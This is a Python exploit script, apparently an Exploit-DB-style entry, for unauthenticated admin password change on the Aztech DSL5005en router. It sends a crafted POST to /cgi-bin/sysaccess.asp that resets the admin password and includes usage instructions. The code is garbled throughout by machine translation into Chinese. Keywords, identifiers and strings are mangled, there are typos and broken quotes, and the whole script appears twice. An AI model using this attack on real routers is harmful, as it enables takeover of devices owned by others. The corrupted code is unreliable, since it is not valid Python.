#利用title: Aztech DSL5005en路由器- 'sysaccess.asp'管理员密码更改(未经身份验证)
#日期: 2025-02-26
#利用作者: Amir Hossein Jamshidi
#供应商homepage: https://www.aztech.com
#版本: DSL5005en
#在: Linux上测试
#CVE: N/A。
导入请求
导入argparse
打印(''''
######################
#AZTECH DSL5005en路由器/调制解调器- 管理员密码更改(未经身份验证)#
#BY: Amir Hossein Jamshidi#
#mail: [email protected]#
#github: https://github.com/amirhosseinjamshidi64#
#USAGE: PYTHON EXPLOIT.PY -IP TRAGET_IP- PASSWORD密码#
######################
''))
def change_password(ip_address,密码):
'''
在给定的IP地址更改设备的密码。
ARGS:
IP_ADDRESS:设备的IP地址(例如'192.168.1.1')。
密码:要设置的新密码。
'''
url=f'http://{ip_address}/cgi-bin/sysaccess.asp'
原点=f'http://{ip_address}'
参考器=f'http://{ip_address}/cgi-bin/sysaccess.asp'
有效载荷={
'SaveFlag':'1',
'Adminflag':'1',
'savebtn':'保存',
'uiviewtools_password':密码,
'uiviewtools_passwordconfirm':密码
}
标题={
'cache-control':'max-age=0',
'Accept-Language':'En-US,en; q=0.9',
'Origin':起源,
'content-type':'应用程序/x-www-form-urlencoded',
'升级- 不肯定- 重新要求':'1',
'用户代理:'Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,例如Gecko)Chrome/131.0.6778.86
'Accept':'Text/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/webP,Image/apng,/; q=0.8,application/application/application/nigned-exchange; v=b3; q=0.7''',Q=0.7',
'参考器:参考器,
'Connection':'饲养'
}
TRY:
响应=requests.post(url,data=有效载荷,标头=标题,超时=10)
if antsphy.status_code==200:
打印(f'Password更改请求到{ip_address}成功!')
打印(f'username: admin')
打印(f'Password: {passwass}')
其他:
print(f'request to {ip_address},状态代码: {response.status_code}')
print(f'Response content: \ n {response.text}')#调试的打印响应
除了requests.exceptions.requestexception为e:
打印(发生f'an错误: {e}')
如果name=='__ -Main __':
parser=argparse.argumentparser(description='设备的更改密码。')
parser.add_argument(' - ip',dest='ip_address',必需=true,help='设备的IP地址。')
parser.add_argument(' - 密码',dest='密码',必需=true,help='设置新密码。')
args=parser.parse_args()
change_password(args.ip_address,args.password)
#日期: 2025-02-26
#利用作者: Amir Hossein Jamshidi
#供应商homepage: https://www.aztech.com
#版本: DSL5005en
#在: Linux上测试
#CVE: N/A。
导入请求
导入argparse
打印(''''
######################
#AZTECH DSL5005en路由器/调制解调器- 管理员密码更改(未经身份验证)#
#BY: Amir Hossein Jamshidi#
#mail: [email protected]#
#github: https://github.com/amirhosseinjamshidi64#
#USAGE: PYTHON EXPLOIT.PY -IP TRAGET_IP- PASSWORD密码#
######################
''))
def change_password(ip_address,密码):
'''
在给定的IP地址更改设备的密码。
ARGS:
IP_ADDRESS:设备的IP地址(例如'192.168.1.1')。
密码:要设置的新密码。
'''
url=f'http://{ip_address}/cgi-bin/sysaccess.asp'
原点=f'http://{ip_address}'
参考器=f'http://{ip_address}/cgi-bin/sysaccess.asp'
有效载荷={
'SaveFlag':'1',
'Adminflag':'1',
'savebtn':'保存',
'uiviewtools_password':密码,
'uiviewtools_passwordconfirm':密码
}
标题={
'cache-control':'max-age=0',
'Accept-Language':'En-US,en; q=0.9',
'Origin':起源,
'content-type':'应用程序/x-www-form-urlencoded',
'升级- 不肯定- 重新要求':'1',
'用户代理:'Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,例如Gecko)Chrome/131.0.6778.86
'Accept':'Text/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/webP,Image/apng,/; q=0.8,application/application/application/nigned-exchange; v=b3; q=0.7''',Q=0.7',
'参考器:参考器,
'Connection':'饲养'
}
TRY:
响应=requests.post(url,data=有效载荷,标头=标题,超时=10)
if antsphy.status_code==200:
打印(f'Password更改请求到{ip_address}成功!')
打印(f'username: admin')
打印(f'Password: {passwass}')
其他:
print(f'request to {ip_address},状态代码: {response.status_code}')
print(f'Response content: \ n {response.text}')#调试的打印响应
除了requests.exceptions.requestexception为e:
打印(发生f'an错误: {e}')
如果name=='__ -Main __':
parser=argparse.argumentparser(description='设备的更改密码。')
parser.add_argument(' - ip',dest='ip_address',必需=true,help='设备的IP地址。')
parser.add_argument(' - 密码',dest='密码',必需=true,help='设置新密码。')
args=parser.parse_args()
change_password(args.ip_address,args.password)